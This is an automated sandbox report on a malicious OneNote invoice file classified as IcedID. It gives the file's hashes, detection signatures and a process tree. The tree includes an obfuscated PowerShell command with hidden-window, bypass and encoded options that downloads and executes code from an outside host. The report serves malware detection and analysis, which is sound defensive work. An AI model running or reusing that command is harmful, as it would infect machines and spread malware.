Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Inv_02_02_#6.one

Overview

General Information

Sample Name:Inv_02_02_#6.one
Analysis ID:797394
MD5:436d3e6c17fca8ec8f58061720feacb7
SHA1:5e531fb72d6b4baef2c58b5f28f93071d7fb2cb7
SHA256:9ab0514b205de5ea60ad1f2ee168f668b4c0af839b8c7c8b80d39c31a24d2119
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Malicious OneNote
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Yara detected IcedID
PowerShell case anomaly found
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • ONENOTE.EXE (PID: 1972 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Inv_02_02_#6.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • ONENOTEM.EXE (PID: 2040 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • mshta.exe (PID: 2100 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
    • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)